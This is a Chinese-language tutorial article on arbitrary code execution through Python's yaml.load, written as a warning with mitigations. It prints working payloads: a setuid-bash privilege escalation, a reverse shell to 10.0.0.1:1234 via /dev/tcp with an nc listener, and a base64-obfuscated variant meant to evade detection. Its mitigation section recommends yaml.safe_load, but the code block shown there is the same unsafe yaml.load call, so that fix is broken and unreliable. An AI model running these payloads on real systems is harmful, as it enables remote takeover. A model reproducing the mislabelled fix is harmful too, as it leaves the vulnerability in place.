在 Python 中使用 YAML 時要小心！可能存在安全漏洞-Python教學-PHP中文網

首頁

後端開發

Python教學

在 Python 中使用 YAML 時要小心！可能存在安全漏洞

Patricia Arquette

Jan 03, 2025 pm 10:15 PM

Be Careful When Using YAML in Python! There May Be Security Vulnerabilities

Python 中的 YAML（YAML 不是標記語言）函式庫已被確定存在允許在特定條件下執行任意命令的漏洞。此漏洞是由於使用 yaml.load 函數而未指定安全性載入程式而引起的。預設情況下，yaml.load 可以執行任意 Python 對象，這為惡意負載創建了攻擊面。

透過任意指令執行進行利用

根本風險在於反序列化過程。當 YAML 文件包含惡意負載時，yaml.load 會處理嵌入的指令，可能導致程式碼執行。例如，考慮以下程式碼片段：

import yaml

filename = "example.yml"
data = open(filename, 'r').read()
yaml.load(data)  # Unsafe usage

這裡，yaml.load 函數不受限制地解析 example.yml，如果 YAML 內容包含不安全指令，則該函數很容易受到攻擊。典型的漏洞利用負載可以被設計來執行任意系統指令。

有效負載範例

import yaml
from yaml import Loader, UnsafeLoader

# Malicious payload
payload = b'!!python/object/new:os.system ["cp `which bash` /tmp/bash;chown root /tmp/bash;chmod u+sx /tmp/bash"]'

# Exploitation
yaml.load(payload)
yaml.load(payload, Loader=Loader)
yaml.load(payload, Loader=UnsafeLoader)

每個呼叫都會處理有效負載，從而在 /tmp/bash 中建立特權可執行檔。然後可以使用提升的權限執行該二進位檔案：

/tmp/bash -p

這表明，如果在權限配置錯誤或存在其他弱點的系統上利用該漏洞，則可能會出現權限提升的可能性。

反向 Shell 攻擊

一個特別陰險的用例是利用該漏洞進行反向 shell。這使得攻擊者能夠遠端存取目標電腦。該過程涉及在攻擊者的電腦上啟動偵聽器並製作旨在建立反向連接的 YAML 文件。

在攻擊者的機器上，啟動 Netcat 監聽器：

nc -lvnp 1234

在目標系統上，以 root 身分執行以下 Python 腳本：

import yaml

# Reverse shell payload
data = '!!python/object/new:os.system ["bash -c \"bash -i >& /dev/tcp/10.0.0.1/1234 0>&1\""]'
yaml.load(data)  # Executes the reverse shell

此有效負載指示目標電腦連接回攻擊者的偵聽器，提供具有執行程序權限的完全互動式 shell。

用於混淆的 Base64 編碼

要繞過基本的安全控製或過濾器，有效負載可以進行 Base64 編碼。此方法增加了一層混淆，可能會逃避靜態分析工具的偵測。

例子

from base64 import b64decode
import yaml

# Base64-encoded payload
encoded_payload = b"ISFweXRa...YXNoIl0="  # Truncated for brevity
payload = b64decode(encoded_payload)

# Execute the payload
yaml.load(payload)

緩解技術

專業人員必須採用嚴格的編碼實務來消除此類漏洞。建議的緩解措施包括：

使用安全性載入器：將 yaml.load 替換為 yaml.safe_load，這樣可以防止執行任意物件。
```
import yaml

filename = "example.yml"
data = open(filename, 'r').read()
yaml.load(data)  # Unsafe usage
```
限制輸入來源：確保 YAML 輸入經過淨化並且僅來自可信來源。
應用靜態分析：使用工具掃描程式碼庫是否有不安全的 yaml.load 呼叫。
環境強化：限制系統權限以最大程度地減少利用的影響。例如，使用容器化環境限制了攻擊者提升權限的能力。

YAML 函式庫的預設行為體現了與 Python 等動態類型語言中的反序列化相關的風險。利用此漏洞所需的複雜程度極低，因此它成為安全應用程式開發的高優先級問題。採用安全的編碼實踐以及強大的輸入驗證和運行時保護措施對於有效減輕這些風險至關重要。

以上是在 Python 中使用 YAML 時要小心！可能存在安全漏洞的詳細內容。更多資訊請關注PHP中文網其他相關文章！

陳述

本文內容由網友自願投稿，版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容，請聯絡admin@php.cn

如何使用Python查找文本文件的ZIPF分佈Mar 05, 2025 am 09:58 AM

本教程演示如何使用Python處理Zipf定律這一統計概念，並展示Python在處理該定律時讀取和排序大型文本文件的效率。您可能想知道Zipf分佈這個術語是什麼意思。要理解這個術語，我們首先需要定義Zipf定律。別擔心，我會盡量簡化說明。 Zipf定律 Zipf定律簡單來說就是：在一個大型自然語言語料庫中，最頻繁出現的詞的出現頻率大約是第二頻繁詞的兩倍，是第三頻繁詞的三倍，是第四頻繁詞的四倍，以此類推。讓我們來看一個例子。如果您查看美國英語的Brown語料庫，您會注意到最頻繁出現的詞是“th

python中的圖像過濾Mar 03, 2025 am 09:44 AM

處理嘈雜的圖像是一個常見的問題，尤其是手機或低分辨率攝像頭照片。本教程使用OpenCV探索Python中的圖像過濾技術來解決此問題。圖像過濾：功能強大的工具圖像過濾器

我如何使用美麗的湯來解析HTML？Mar 10, 2025 pm 06:54 PM

本文解釋瞭如何使用美麗的湯庫來解析html。它詳細介紹了常見方法，例如find（），find_all（），select（）和get_text（），以用於數據提取，處理不同的HTML結構和錯誤以及替代方案（SEL）

如何使用TensorFlow或Pytorch進行深度學習？Mar 10, 2025 pm 06:52 PM

本文比較了Tensorflow和Pytorch的深度學習。它詳細介紹了所涉及的步驟：數據準備，模型構建，培訓，評估和部署。框架之間的關鍵差異，特別是關於計算刻度的

Python中的平行和並發編程簡介Mar 03, 2025 am 10:32 AM

Python是數據科學和處理的最愛，為高性能計算提供了豐富的生態系統。但是，Python中的並行編程提出了獨特的挑戰。本教程探討了這些挑戰，重點是全球解釋

如何在Python中實現自己的數據結構Mar 03, 2025 am 09:28 AM

本教程演示了在Python 3中創建自定義管道數據結構，利用類和操作員超載以增強功能。管道的靈活性在於它能夠將一系列函數應用於數據集的能力，GE

python對象的序列化和避難所化：第1部分Mar 08, 2025 am 09:39 AM

Python 對象的序列化和反序列化是任何非平凡程序的關鍵方面。如果您將某些內容保存到 Python 文件中，如果您讀取配置文件，或者如果您響應 HTTP 請求，您都會進行對象序列化和反序列化。從某種意義上說，序列化和反序列化是世界上最無聊的事情。誰會在乎所有這些格式和協議？您想持久化或流式傳輸一些 Python 對象，並在以後完整地取回它們。這是一種在概念層面上看待世界的好方法。但是，在實際層面上，您選擇的序列化方案、格式或協議可能會決定程序運行的速度、安全性、維護狀態的自由度以及與其他系

Python中的數學模塊：統計Mar 09, 2025 am 11:40 AM

Python的statistics模塊提供強大的數據統計分析功能，幫助我們快速理解數據整體特徵，例如生物統計學和商業分析等領域。無需逐個查看數據點，只需查看均值或方差等統計量，即可發現原始數據中可能被忽略的趨勢和特徵，並更輕鬆、有效地比較大型數據集。本教程將介紹如何計算平均值和衡量數據集的離散程度。除非另有說明，本模塊中的所有函數都支持使用mean()函數計算平均值，而非簡單的求和平均。也可使用浮點數。 import random import statistics from fracti

See all articles